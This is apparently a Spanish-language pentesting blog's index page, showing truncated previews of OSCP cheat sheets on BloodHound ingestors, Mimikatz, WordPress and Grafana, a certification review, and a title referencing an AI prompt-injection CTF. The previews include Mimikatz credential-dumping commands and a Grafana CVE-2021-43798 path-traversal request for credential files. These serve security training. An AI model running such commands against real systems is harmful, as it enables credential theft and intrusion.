Fenixia

Bloodhound Ingestor
Bloodhound Ingestor
Creado|Actualizado|OSCP CheatSheet|bloodhound
Existen multiples ingestores para Bloodhound siendo el mas popular bloodhound-python, todo este articulo muestra tanto para BloodHound-Legacy tanto para Bloodhound-CE (Recomendación dejar de utilizar BloodHound-Legacy y centrarse en BloodHound-CE) RustHoundBloodhound-python pero en Rust, proyecto en constante actualización y disponible en el siguiente Repositorio.Uso básico: 123./rusthound -d hokkaido-aerospace.com -u Hazel.Green -p 'pass' -z# Para BloodHound-CErusthound-ce -d lab.t...
Mimikatz
Mimikatz
Creado|Actualizado|OSCP CheatSheet|mimikatz
Iniciar12345678# Iniciar Mimikatzmimikatz.exe# Verificar/obtener privilegios (siempre ejecutar primero)privilege::debug# Elevar a SYSTEM (si es necesario)token::elevate Extracción de Credenciales12345678910111213141516171819202122# Extraer credenciales en texto plano de la memoriasekurlsa::logonpasswords# Extraer secretos LSA (servicios, auto-logon)lsadump::secrets# Extraer hashes SAM locallsadump::samlsadump::lsa /patch #both these dump SAM# Extraer cachés de credenciales de dominiolsadump::...
Pentesting Wordpress
Pentesting Wordpress
Creado|Actualizado|OSCP CheatSheet|cmswordpress
Credenciales Por Defecto1admin:password Enumeración Manual12345678910111213141516171819202122# Version de Wordpresscurl -s -X GET http://blog.inlanefreight.com | grep '<meta name="generator"'# Plugins (Recomendado hacerlo en articulos de WordPress)curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2# Themescurl -s -X GET http://blog.inlanefreight.c...
Pentesting Grafana
Pentesting Grafana
Creado|Actualizado|OSCP CheatSheet|cmsgrafana
Credenciales Por Defecto12admin:adminadmin:prom-operator Archivos interesantes12/etc/grafana/grafana.ini # admin_user y admin_password (secretKey)/var/lib/grafana/grafana.db # Mirar la tabla data_source CVE 2021-43798Existe un exploit para Grafana 8.3.0 este permite realizar un directory traversal a partir del directorio de los plugins; para acceder a los anteriores archivos, aunque también se puede realizar con curl: 1curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../....
CRTA 2025 Review
CRTA 2025 Review
Creado|Actualizado|Certificaciones|CyberWarfare
Certified Red Team Analyst, también conocido como CRTA, es una de las certificaciones que han tenido mucha popularidad recientemente, así que después de haber obtenido el OSCP decidí darle una oportunidad a CyberWarfare Labs con el CRTA. He de decir antes que nada que me tocó tomar la versión del examen de 6 horas. A fecha de redacción de este artículo, el examen no ha cambiado y esta review se centra en este material específico. CursoRespecto al material que te ofrecen del curso, te dan un...
avatar
Fenixia
Artículos
15
Etiquetas
28
Categorías
5
LinkedIn
Anuncios
- Siguen existiendo algunos errores de visualizacion en algunos writeups pronto estare corrigiendo este problema.
Publicaciones Recientes
One Prompt to Rule Them All - AI HTB Cyber Apocalypse 2025
One Prompt to Rule Them All - AI HTB Cyber Apocalypse 2025
Yadis
Yadis
SAU
SAU
Cicada
Cicada
Cronos
Cronos
Categorías
Etiquetas
SQLi AS-REP Roasting Kerberoasting SSH mimikatz Active Directory Command Injection CyberWarfare command injection SSRF PHP DNS redis DCSync nmap HackTheBox BSCP Prompt Injection Cron Jobs bloodhound path hijacking portforwarding wordpress OSINT CTF grafana cms go
Archivo
Información del Sitio
Cantidad de Artículos :
15
Última Actualización :